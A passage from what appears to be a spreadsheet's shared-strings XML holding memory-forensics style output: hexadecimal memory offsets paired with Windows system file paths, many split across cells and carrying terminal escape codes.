    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\d45570f46a3d94dde574fa9628f73b5c\</t>
  </si>
  <si>
    <t>System.Numeri</t>
  </si>
  <si>
    <t>cs.ni.dll.a</t>
  </si>
  <si>
    <t>0xdef3bf80</t>
  </si>
  <si>
    <t>0xdef3c038</t>
  </si>
  <si>
    <t>0xdef3c4f0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\d30d9467300d5513f6d90645674ca945\Syst</t>
  </si>
  <si>
    <t>em.Xaml.ni.dl</t>
  </si>
  <si>
    <t>l.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef3c7a8</t>
  </si>
  <si>
    <t>0xdef3ca88</t>
  </si>
  <si>
    <t>0xdef3cec8</t>
  </si>
  <si>
    <t>0xdef3cf80</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#\efbdc9d615fc3121e1957c93e675</t>
  </si>
  <si>
    <t>a13d\System.W</t>
  </si>
  <si>
    <t>indows.Inpu</t>
  </si>
  <si>
    <t>t.Mani</t>
  </si>
  <si>
    <t>pulations.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef3d1b0</t>
  </si>
  <si>
    <t>0xdef3d450</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP63F1.tmp\Microsoft.MediaCenter.UI.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef3d5e0</t>
  </si>
  <si>
    <t>0xdef3d698</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\ccdcdc775ebbb174ec9defb2aa92fe1</t>
  </si>
  <si>
    <t>5\UIAutomatio</t>
  </si>
  <si>
    <t>nTypes.ni.d</t>
  </si>
  <si>
    <t>0xdef3d7e0</t>
  </si>
  <si>
    <t>0xdef3da08</t>
  </si>
  <si>
    <t>\$Directory_x001B_[0K_x001B_[98G</t>
  </si>
  <si>
    <t>0xdef3db98</t>
  </si>
  <si>
    <t>0xdef3de18</t>
  </si>
  <si>
    <t>0xdef3e3c0</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\NCProv.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef3e660</t>
  </si>
  <si>
    <t>pulations.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef3e718</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\00989211849bae1e38d96eda266b</t>
  </si>
  <si>
    <t>cf7f\Presenta</t>
  </si>
  <si>
    <t>o.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef3ef80</t>
  </si>
  <si>
    <t>0xdef3f438</t>
  </si>
  <si>
    <t>0xdef3f558</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq\12c46f697a0ad2af7c07d4375fa095a6</t>
  </si>
  <si>
    <t>Linq.ni.dll</t>
  </si>
  <si>
    <t>0xdef3f610</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#\23896a16ab4a24e3ed1b1441e36a</t>
  </si>
  <si>
    <t>7fb5\Presenta</t>
  </si>
  <si>
    <t>rk.Roy</t>
  </si>
  <si>
    <t>ale.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef3fb18</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\3f4c803549f997325ffdd261d3bb</t>
  </si>
  <si>
    <t>7db3\System.R</t>
  </si>
  <si>
    <t>untime.Seri</t>
  </si>
  <si>
    <t>0xdef3fbd0</t>
  </si>
  <si>
    <t>0xdef40270</t>
  </si>
  <si>
    <t>0xdef403a8</t>
  </si>
  <si>
    <t>0xdef404e8</t>
  </si>
  <si>
    <t>0xdef40988</t>
  </si>
  <si>
    <t>0xdef40ad8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\d7d9c1c30da2b861722454d6a385</t>
  </si>
  <si>
    <t>16d3\System.E</t>
  </si>
  <si>
    <t>nterpriseSe</t>
  </si>
  <si>
    <t>rvices</t>
  </si>
  <si>
    <t>0xdef40f00</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\IMpService925A3ACA-C353-458A-AC8D-A7E5EB378092.lock_x001B_[0</t>
  </si>
  <si>
    <t>0xdef41210</t>
  </si>
  <si>
    <t>0xdef41738</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP6756.tmp\System.IdentityModel.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef41a40</t>
  </si>
  <si>
    <t>0xdef41d18</t>
  </si>
  <si>
    <t>0xdef41f80</t>
  </si>
  <si>
    <t>0xdef422c8</t>
  </si>
  <si>
    <t>0xdef42380</t>
  </si>
  <si>
    <t>\Windows\System32\SearchIndexer.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef42570</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider\3a445b2fe772976aca8b62217acd</t>
  </si>
  <si>
    <t>0965\UIAutoma</t>
  </si>
  <si>
    <t>tionProvide</t>
  </si>
  <si>
    <t>r.ni.d</t>
  </si>
  <si>
    <t>0xdef42d18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework\v4.0_4.0.0.0__31bf3856ad364e35\</t>
  </si>
  <si>
    <t>PresentationF</t>
  </si>
  <si>
    <t>ramework.dl</t>
  </si>
  <si>
    <t>0xdef42ec8</t>
  </si>
  <si>
    <t>0xdef42f80</t>
  </si>
  <si>
    <t>ng.ni.dll.a</t>
  </si>
  <si>
    <t>0xdef43f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_microsoft.net_framework_v3.0_windows_communication_foundation_en-u</t>
  </si>
  <si>
    <t>s_ff3176905af</t>
  </si>
  <si>
    <t>82a92.cdf-m</t>
  </si>
  <si>
    <t>0xdef44a08</t>
  </si>
  <si>
    <t>0xdef44ac0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\Syst</t>
  </si>
  <si>
    <t>em.Transactio</t>
  </si>
  <si>
    <t>0xdef44e00</t>
  </si>
  <si>
    <t>0xdef44f80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\</t>
  </si>
  <si>
    <t>System.Servic</t>
  </si>
  <si>
    <t>eProcess.dl</t>
  </si>
  <si>
    <t>0xdef46788</t>
  </si>
  <si>
    <t>0xdef468a0</t>
  </si>
  <si>
    <t>0xdef47918</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#\20c1d56ced4c069e106c2a99c91e</t>
  </si>
  <si>
    <t>6bc9\System.C</t>
  </si>
  <si>
    <t>position.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef48038</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\35c614ce5124a5b43dc3c12323902</t>
  </si>
  <si>
    <t>3d7\System.Tr</t>
  </si>
  <si>
    <t>ansactions.</t>
  </si>
  <si>
    <t>0xdef48320</t>
  </si>
  <si>
    <t>0xdef483d8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#\c329e4403519a5bd303dd62d4e91</t>
  </si>
  <si>
    <t>7acc\Presenta</t>
  </si>
  <si>
    <t>a.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef48588</t>
  </si>
  <si>
    <t>0xdef48640</t>
  </si>
  <si>
    <t>0xdef488b8</t>
  </si>
  <si>
    <t>0xdef48970</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\PresentationCore\094624336192f9bbd8d1_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef48e60</t>
  </si>
  <si>
    <t>0xdef48f80</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProce</t>
  </si>
  <si>
    <t>ss.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef49450</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\8b4daa7b8fddc3b7504a9f1645b7</t>
  </si>
  <si>
    <t>93ab\System.C</t>
  </si>
  <si>
    <t>n.Inst</t>
  </si>
  <si>
    <t>all.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef49cd8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#\212cdc31ec50984c82809d52ae12</t>
  </si>
  <si>
    <t>6ff8\System.W</t>
  </si>
  <si>
    <t>eb.RegularE</t>
  </si>
  <si>
    <t>xpress</t>
  </si>
  <si>
    <t>0xdef49d90</t>
  </si>
  <si>
    <t>.ni.dll.aux</t>
  </si>
  <si>
    <t>0xdef4a1a0</t>
  </si>
  <si>
    <t>0xdef4a488</t>
  </si>
  <si>
    <t>0xdef4a540</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI\5203e2f1545ded5a3a3320696639c80b\P</t>
  </si>
  <si>
    <t>resentationUI</t>
  </si>
  <si>
    <t>0xdef4a9e8</t>
  </si>
  <si>
    <t>0xdef4aad0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\8b2ed2c7bb8f8f6832fa55cc408f3b05\SM</t>
  </si>
  <si>
    <t>Diagnostics.n</t>
  </si>
  <si>
    <t>0xdef4af00</t>
  </si>
  <si>
    <t>0xdef4b9d0</t>
  </si>
  <si>
    <t>0xdef4bac8</t>
  </si>
  <si>
    <t>a.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef4be10</t>
  </si>
  <si>
    <t>0xdef4bec8</t>
  </si>
  <si>
    <t>0xdef4bf80</t>
  </si>
  <si>
    <t>0xdef4c038</t>
  </si>
  <si>
    <t>0xdef4c308</t>
  </si>
  <si>
    <t>0xdef4c3c0</t>
  </si>
  <si>
    <t>all.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef4c540</t>
  </si>
  <si>
    <t>0xdef4c728</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef4e228</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\9c7a5ecf745ec0afa25b8952ea7e</t>
  </si>
  <si>
    <t>2fbf\System.S</t>
  </si>
  <si>
    <t>.Inter</t>
  </si>
  <si>
    <t>nals.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef4ea78</t>
  </si>
  <si>
    <t>0xdef4ec28</t>
  </si>
  <si>
    <t>o.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef4f3b0</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\scsiport.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef4f500</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmgatew.inf_x86_neutral_c895ee8908d12f25\mdmgate</t>
  </si>
  <si>
    <t>0xdef4f7a8</t>
  </si>
  <si>
    <t>0xdef505b8</t>
  </si>
  <si>
    <t>ternals.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef50730</t>
  </si>
  <si>
    <t>0xdef50960</t>
  </si>
  <si>
    <t>0xdef51038</t>
  </si>
  <si>
    <t>0xdef51270</t>
  </si>
  <si>
    <t>0xdef51cf0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\19350e117129aa08fb08_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef522a8</t>
  </si>
  <si>
    <t>svcr80.dll_x001B_[0</t>
  </si>
  <si>
    <t>0xdef52788</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef52840</t>
  </si>
  <si>
    <t>0xdef53038</t>
  </si>
  <si>
    <t>0xdef532f8</t>
  </si>
  <si>
    <t>0xdef533b0</t>
  </si>
  <si>
    <t>position.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef538c8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmx5560.inf_x86_neutral_f4f9ee69f0d60bfb\mdmx556</t>
  </si>
  <si>
    <t>0xdef53e38</t>
  </si>
  <si>
    <t>0xdef53ef0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\66fadc81a461e70f135e1f8cf6d6</t>
  </si>
  <si>
    <t>9dc4\System.D</t>
  </si>
  <si>
    <t>0xdef54f80</t>
  </si>
  <si>
    <t>\Windows\System32\api-ms-win-core-synch-l1-2-0.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef55170</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#\8fcfefc448a34ffcd670966a6b33</t>
  </si>
  <si>
    <t>431c\System.R</t>
  </si>
  <si>
    <t>untime.Cach</t>
  </si>
  <si>
    <t>ing.ni</t>
  </si>
  <si>
    <t>0xdef553b8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.JScript\ac1d3161bddb8755bc91e4e57f549aa</t>
  </si>
  <si>
    <t>2\Microsoft.J</t>
  </si>
  <si>
    <t>Script.ni.d</t>
  </si>
  <si>
    <t>0xdef55808</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.Composition\v4.0_4.0.0.0__b77a5</t>
  </si>
  <si>
    <t>c561934e089\S</t>
  </si>
  <si>
    <t>ystem.Compo</t>
  </si>
  <si>
    <t>nentMo</t>
  </si>
  <si>
    <t>del.Composition.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef56210</t>
  </si>
  <si>
    <t>0xdef562c8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Data.SqlXml\2.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll</t>
  </si>
  <si>
    <t>0xdef56448</t>
  </si>
  <si>
    <t>nals.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef56500</t>
  </si>
  <si>
    <t>m.Web.ni.dll_x001B_</t>
  </si>
  <si>
    <t>0xdef56720</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\60c76cb2a3648fcc01290b667765c25c\Syst</t>
  </si>
  <si>
    <t>em.Data.ni.dl</t>
  </si>
  <si>
    <t>0xdef567d8</t>
  </si>
  <si>
    <t>0xdef569d0</t>
  </si>
  <si>
    <t>0xdef56ba0</t>
  </si>
  <si>
    <t>0xdef56d80</t>
  </si>
  <si>
    <t>0xdef56ec8</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\73</t>
  </si>
  <si>
    <t>96C420A8E1BC1</t>
  </si>
  <si>
    <t>DA97F1AF0D1</t>
  </si>
  <si>
    <t>0BAD21</t>
  </si>
  <si>
    <t>0xdef56f80</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.IdentityModel.Selectors\3.0.0.0__b77a5c561934e089\System.Ide</t>
  </si>
  <si>
    <t>ntityModel.Se</t>
  </si>
  <si>
    <t>lectors.dll</t>
  </si>
  <si>
    <t>0xdef57270</t>
  </si>
  <si>
    <t>0xdef57348</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\ReachFramework\3.0.0.0__31bf3856ad364e35\ReachFramework.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef574c8</t>
  </si>
  <si>
    <t>0xdef577a8</t>
  </si>
  <si>
    <t>0xdef57860</t>
  </si>
  <si>
    <t>0xdef57bf8</t>
  </si>
  <si>
    <t>0xdef57cb0</t>
  </si>
  <si>
    <t>0xdef58358</t>
  </si>
  <si>
    <t>0xdef58540</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#\70d459a7857286b75bd75d18b672</t>
  </si>
  <si>
    <t>8668\System.R</t>
  </si>
  <si>
    <t>ion.Formatters.Soap.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef58850</t>
  </si>
  <si>
    <t>0xdef58ab8</t>
  </si>
  <si>
    <t>0xdef58b70</t>
  </si>
  <si>
    <t>0xdef58f80</t>
  </si>
  <si>
    <t>0xdef591d8</t>
  </si>
  <si>
    <t>0xdef59920</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD65E.tmp\System.Configuration.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef59c10</t>
  </si>
  <si>
    <t>ion.Formatters.Soap.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef59cc8</t>
  </si>
  <si>
    <t>0xdef59e18</t>
  </si>
  <si>
    <t>0xdef5a1d0</t>
  </si>
  <si>
    <t>0xdef5a568</t>
  </si>
  <si>
    <t>\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\MpCmdRun.log_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef5a7e0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\cmd.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef5a898</t>
  </si>
  <si>
    <t>0xdef5b6a8</t>
  </si>
  <si>
    <t>0xdef5bbf8</t>
  </si>
  <si>
    <t>0xdef5be00</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#\187bb0621fea00f1d65f4351b97c</t>
  </si>
  <si>
    <t>11a4\System.D</t>
  </si>
  <si>
    <t>Protocols.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef5beb8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\b55ae639e36086e2993865ca7e8e</t>
  </si>
  <si>
    <t>e78d\System.S</t>
  </si>
  <si>
    <t>erviceProce</t>
  </si>
  <si>
    <t>ss.ni.</t>
  </si>
  <si>
    <t>0xdef5c1d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a</t>
  </si>
  <si>
    <t>3a\System.Dir</t>
  </si>
  <si>
    <t>ectoryServi</t>
  </si>
  <si>
    <t>0xdef5c6c8</t>
  </si>
  <si>
    <t>0xdef5c908</t>
  </si>
  <si>
    <t>\Windows\System32\cryptsvc.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef5c9d8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\net8185.inf_x86_neutral_20a13cfe2956ed8a\net8185.</t>
  </si>
  <si>
    <t>0xdef5d038</t>
  </si>
  <si>
    <t>0xdef5d2f8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services\ac0b944873454911434fb8996bfd6</t>
  </si>
  <si>
    <t>e5d\System.We</t>
  </si>
  <si>
    <t>b.Services.</t>
  </si>
  <si>
    <t>0xdef5da30</t>
  </si>
  <si>
    <t>0xdef5dae8</t>
  </si>
  <si>
    <t>0xdef5de18</t>
  </si>
  <si>
    <t>0xdef5e038</t>
  </si>
  <si>
    <t>\Windows\System32\l_intl.nls_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef5e968</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Runtime.Serialization\3.0.0.0__b77a5c561934e089\System.Runti</t>
  </si>
  <si>
    <t>me.Serializat</t>
  </si>
  <si>
    <t>0xdef5ec58</t>
  </si>
  <si>
    <t>0xdef5eeb8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Services\v4.0_4.0.0.0__b03f5f7f11d50a3a\Sy</t>
  </si>
  <si>
    <t>stem.Web.Serv</t>
  </si>
  <si>
    <t>ices.dll_x001B_[0</t>
  </si>
  <si>
    <t>0xdef5fa00</t>
  </si>
  <si>
    <t>0xdef5fc60</t>
  </si>
  <si>
    <t>0xdef5fe10</t>
  </si>
  <si>
    <t>0xdef5fec8</t>
  </si>
  <si>
    <t>0xdef5ff80</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.ServiceModel\3.0.0.0__b77a5c561934e089\System.ServiceModel.d</t>
  </si>
  <si>
    <t>0xdef605a8</t>
  </si>
  <si>
    <t>0xdef61270</t>
  </si>
  <si>
    <t>0xdef61720</t>
  </si>
  <si>
    <t>0xdef617d8</t>
  </si>
  <si>
    <t>\Windows\winsxs\Manifests\x86_policy.8.0.microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_no</t>
  </si>
  <si>
    <t>ne_516d712b0f</t>
  </si>
  <si>
    <t>495a45.mani</t>
  </si>
  <si>
    <t>fest_x001B_[</t>
  </si>
  <si>
    <t>0xdef61920</t>
  </si>
  <si>
    <t>0xdef61c38</t>
  </si>
  <si>
    <t>C8EDB95DF3F0A</t>
  </si>
  <si>
    <t>D4EE2DC2B8C</t>
  </si>
  <si>
    <t>FD4157</t>
  </si>
  <si>
    <t>0xdef62960</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.VisualC\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualC.Dll_x001B_[</t>
  </si>
  <si>
    <t>0xdef62f80</t>
  </si>
  <si>
    <t>0xdef63038</t>
  </si>
  <si>
    <t>0xdef63478</t>
  </si>
  <si>
    <t>0xdef63530</t>
  </si>
  <si>
    <t>0xdef638a8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\mcstore\6.1.0.0__31bf3856ad364e35\mcstore.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef63df8</t>
  </si>
  <si>
    <t>0xdef64218</t>
  </si>
  <si>
    <t>0xdef64448</t>
  </si>
  <si>
    <t>Protocols.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef64bc0</t>
  </si>
  <si>
    <t>0xdef65220</t>
  </si>
  <si>
    <t>0xdef65740</t>
  </si>
  <si>
    <t>0xdef65a00</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP1D9B.tmp\System.Runtime.Remoting.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef65f80</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP5F51.tmp\System.Runtime.Serialization.dll</t>
  </si>
  <si>
    <t>0xdef662c0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#\ad78801b8652ee2f906a33247234</t>
  </si>
  <si>
    <t>db90\Microsof</t>
  </si>
  <si>
    <t>t.Build.Uti</t>
  </si>
  <si>
    <t>lities</t>
  </si>
  <si>
    <t>.v4.0.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef66378</t>
  </si>
  <si>
    <t>0xdef666a0</t>
  </si>
  <si>
    <t>0xdef66940</t>
  </si>
  <si>
    <t>.v4.0.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef669f8</t>
  </si>
  <si>
    <t>0xdef66ef0</t>
  </si>
  <si>
    <t>0xdef67038</t>
  </si>
  <si>
    <t>0xdef675c8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef67ba8</t>
  </si>
  <si>
    <t>0xdef68038</t>
  </si>
  <si>
    <t>\Windows\System32\wups.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef68180</t>
  </si>
  <si>
    <t>0xdef692b0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP1B38.tmp\System.DirectoryServices.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef69500</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#\a00778ed6c14b11ae0b1bd41e6c9</t>
  </si>
  <si>
    <t>1065\Microsof</t>
  </si>
  <si>
    <t>t.Build.Fra</t>
  </si>
  <si>
    <t>0xdef69ab0</t>
  </si>
  <si>
    <t>0xdef6a0e0</t>
  </si>
  <si>
    <t>0xdef6a210</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#\75a3fd9683df76ec933242682822</t>
  </si>
  <si>
    <t>c9ce\Microsof</t>
  </si>
  <si>
    <t>0.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef6a9f8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#\01319aa83bb38b6f794619b30572</t>
  </si>
  <si>
    <t>2379\System.D</t>
  </si>
  <si>
    <t>rawing.Desi</t>
  </si>
  <si>
    <t>gn.ni.</t>
  </si>
  <si>
    <t>0xdef6aba8</t>
  </si>
  <si>
    <t>0xdef6ad58</t>
  </si>
  <si>
    <t>0xdef6ae18</t>
  </si>
  <si>
    <t>0.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef6b168</t>
  </si>
  <si>
    <t>0xdef6b220</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\4753c9208ed057d4d1c_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef6b2f8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#\a584349761dc30fd2ed6ff084ecc</t>
  </si>
  <si>
    <t>a32d\System.D</t>
  </si>
  <si>
    <t>ata.OracleC</t>
  </si>
  <si>
    <t>lient.</t>
  </si>
  <si>
    <t>0xdef6b3b0</t>
  </si>
  <si>
    <t>0xdef6b8a8</t>
  </si>
  <si>
    <t>0xdef6b9f0</t>
  </si>
  <si>
    <t>0xdef6bca8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\ehiUserXp\4608e5a8551b872fe773_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef6c2e0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPF42C.tmp\PresentationFramework.Classic.dl</t>
  </si>
  <si>
    <t>0xdef6c4a8</t>
  </si>
  <si>
    <t>0xdef6c760</t>
  </si>
  <si>
    <t>0xdef6c818</t>
  </si>
  <si>
    <t>0xdef6c9c8</t>
  </si>
  <si>
    <t>0xdef6d3e8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP5437.tmp\System.Drawing.Design.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef6d5d0</t>
  </si>
  <si>
    <t>0xdef6db80</t>
  </si>
  <si>
    <t>0xdef6df80</t>
  </si>
  <si>
    <t>0xdef6e038</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netvfx86.inf_x86_neutral_325ccb4cde393e5d\netvfx8</t>
  </si>
  <si>
    <t>0xdef6e1a8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnky002.inf_x86_neutral_141ca768bc51ceff\prnky00</t>
  </si>
  <si>
    <t>0xdef6e260</t>
  </si>
  <si>
    <t>0xdef6e4c0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_resources_ease_of_access_themes_e29108c7f81ea04c.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef6e578</t>
  </si>
  <si>
    <t>0xdef6e680</t>
  </si>
  <si>
    <t>\Windows\System32\sxshared.dll_x001B_[0K_x001B_[100G</t>
  </si>
  <si>
    <t>0xdef6e860</t>
  </si>
  <si>
    <t>0xdef6eb38</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\iSCSI Initiator.lnk_x001B_[0</t>
  </si>
  <si>
    <t>0xdef6ef80</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\ndis.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef6faa8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\mcepg\6.1.0.0__31bf3856ad364e35\mcepg.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef6fc98</t>
  </si>
  <si>
    <t>0xdef70318</t>
  </si>
  <si>
    <t>0xdef70488</t>
  </si>
  <si>
    <t>0xdef70e50</t>
  </si>
  <si>
    <t>0xdef715a0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\mcupdate\6.1.0.0__31bf3856ad364e35\mcupdate.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef718a0</t>
  </si>
  <si>
    <t>\MsFteWds_x001B_[0K</t>
  </si>
  <si>
    <t>0xdef71c08</t>
  </si>
  <si>
